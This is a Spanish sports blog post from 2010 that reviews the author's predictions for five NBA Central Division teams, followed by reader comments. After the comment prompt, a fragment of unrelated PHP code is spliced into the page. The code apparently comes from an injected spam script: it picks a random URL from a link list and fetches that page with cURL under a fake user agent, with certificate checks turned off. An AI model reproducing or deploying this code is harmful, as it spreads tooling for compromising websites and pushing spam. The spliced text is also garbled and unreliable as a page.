Revisando los pronósticos t2010: Central

21 de February de 2010 por TheDeerHunter

Cleveland Cavaliers: Temibles. Ya lo eran al principio de temporada cuando les pronosticamos como posibles finalistas. Cierto que les costó arrancar, entender las posibilidades de tener a Shaq e Ilgauskas. El 32 tampoco es el gran pívot que se hizo con el MVP del all-star el año pasado. Ni siquiera pudo acudir a la fiesta en esta ocasión. Surgían dudas con los nuevos, también con Delonte y el paso del tiempo las ha ido despejando. Venían siendo el equipo con el mejor balance, el mejor diferencial anotados/encajados, el jugador más valioso de la liga… y ahora para colmo  mejoran la plantilla incorporando a Jamison, a Powe y posiblemente a Ilgauskas en cuanto resuelva el Buy-out. Todo nos hace temer que incluso el pronóstico de finalista se nos quedara corto. Pero claro, el año pasado por estas fechas todo funcionaba como la seda…

Lo mejor: Muy pocos peros. Los líderes de la liga son un equipo con muy pocas fisuras y sí muchas alternativas tácticas. Se nombra poco a Danni Ferry pero deberían reconocerle su mérito pronto. Ha hecho todo lo que está en su mano para retener a LeBron.

Lo peor: Que siguen un guión y un estilo de juego muy similar al del año pasado. Algunos defectos no los han corregido y los playoffs no son la regular. Todo lo que no sea el anillo es un fracaso y un drama. Simplemente supondría la desarticulación de este proyecto. Ya notamos cierta ansiedad el curso pasado.

Chicago Bulls: Pues un poco ilusos sí que fuimos, quizás todavía ensoñados tras una de las mejores series de Playoffs que hayamos visto nunca. Lo de primera ronda está bien… pero ¿lo de mínimo? Vinnie Del Negro sale a la palestra afirmando que los Bulls no han tirado la temporada 2010, como si él lo pudiera saber con todos los rumores que ha habido sobre su despido.  Con un balance incluso superior a la ilusionante temporada anterior aquello parece el apocalipsis. Media plantilla por el aire, la otra media en todos los rumores. Desde luego que no apostamos porque nos vuelvan a hacer vibrar tanto como el año pasado.

Lo mejor: La plaza de playoffs, con todo lo que les ha caído encima. La actitud de los jugadores para salvar a su técnico.

Lo peor: Demasiados nervios e inestabilidad como para consolidar un proyecto basado en tanta figura joven.

Milwaukee Bucks: No estuvimos excesivamente finos en el mal “karma” que nos transmitían estos Bucks. Vaticinamos un “muy fuera de playoffs” que no se ajusta a la realidad de lo que llevamos de temporada, aunque claro aún pueden estar a tiempo de estropearlo y tampoco están muy dentro. El gran activo de que todavía estén luchando por la temporada ha sido Brandon Jennings, mostrando una capacidad y un liderazgo que sinceramente (y es lógico) no esperábamos la mayoría, sobre todo con Schiles dirigiendo la nave. Después se han encontrado con el buen hacer de Bogut y de otras piezas como Ridnour, Delfino, Ilyasova… aunque con el contratiempo de lo de Michael Redd. Ahora se mueven con la clara intención de entrar en postemporada. Muy loable.

Lo mejor: Jennings, pero también muchos otros. Intentan jugar bien estos Bucks.

Lo peor: La lesión de Michael Redd. Con él hubieran terminado de reventar nuestro pronóstico.

Detroit Pistons: Y los cambios llegaron… pero para peor. No hay muchos despropósitos más grandes que este. Hay que ponerse a pensar para encontrar peores inversiones que Villanueva y Gordon. A Mr. Joe Dumars empiezan a patinarle las neuronas con decisiones ruinosas… y mientras un tal Billups metiendo hasta el muñón el dedo en la llaga.
Aún están teniendo suerte de que Ben Wallace y Jebreko están rindiendo por encima de lo esperado. Del resto poco podemos destacar en positivo. Es imposible que esta banda se clasifique para postemporada como pronosticamos pero, en esta ocasión, no podrán echarle las culpas de sus males a Iverson.

Lo mejor: Otra de nostálgicos. Big Ben con la camiseta de los Pistons… pero no es suficiente para ningún equipo con aspiraciones.

Lo peor: Se puede ganar y se puede perder, pero la imagen de este equipo mancilla por completo el historial de uno de las franquicias más potentes de la última década (y también de la historia, por cierto) La palabra ridículo ha sido perfectamente aplicable a demasiados partidos esta campaña.

Indiana Pacers: Pues no hay prisa, pero tampoco debería de haber pausa. Por ‘H’ o por ‘B’ los Pacers parecen estar encerrados en un bucle infinito de mediocridad. Les dimos para pelear por la postemporada pero es que no se lo creen ni ellos.
No podemos decir que son una banda, han hecho partidos buenos demostrando algunas cosas… pero es que apestan a mediocridad, parecen dormidos. Hasta el mismo Granger parece abonado al “esto no va conmigo” y ha perdido su condición de all-star. Eso sí, para ser justos, con algunos problemas físicos de por medio.

Lo mejor: Algún partido de Roy Hibbert, alguno de Dahntay Jones, alguno de Brandon Rush…

La irregularidad: Capaces de lo mejor… pero en general sólo muestran lo peor. O’Brien antes molaba.

Comenta

6 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Pues a mí a pesar del buen comienzo de Brandon Jennings, me sigue sin convencer. Cualquier otro jugador no hubiera tenido tantas posibilidades de hacerlo mal. Ha tenido partidos horribles. Aunque a su favor es que tiene mucho margen de mejora, quizás con la experiencia pueda llegar a ser un jugador importante y no “un quiero y no puedo”, como yo creo que es ahora.

      Citar

  2. Viva_Dirk dice:
    #2

    Yo no creo que la inversión en Gordon vaya a ser ruinosa, hasta que se lesionó estuvo jugando a un tremendo nivel, lo de Villanueva depende únicamente de el. Lo que si que creo es que han perdido una buena oportunidad de sacar algo por Hamilton.

    Hay muchos jugadores que en su año rookie hacen partidos tan malos como los que ha hecho Jennings, que no es tan chupón como se dice.

      Citar

  3. pcerezo dice:
    #3

    Buena foto de Spolekstra por la Quindici del Negro…jjj

      Citar

  4. TheDeerHunter dice:
    #4

    lapsus!!!
    era para comprobar si estábais atentos
    XD

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Tremenda la foto de Granger y las ocas por ahí detrás…

      Citar

  6. LEmontus dice:
    #6

    Yo creo que pistons es un buen equipo y que no ha tenido suerte con las lesiones. Despues de acertar con jerebko la clave ha sido que no han podido juga practicamente ni un partido con su equipo de gala :

    Studkey Rip Prince Jerebko Wallace con un banquillo temible con Bynum Gordon y Villanueva .. yo me la juagaba a no tocar ninguna pieza para la proxima temporada y tratar de contratar calidad ofensiva en la pintura. De todas maneras esta temporada no va a ser la suya lesionados rip,prince,studkey,wallace y otra vez prince. Con todos sanos un equipazo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>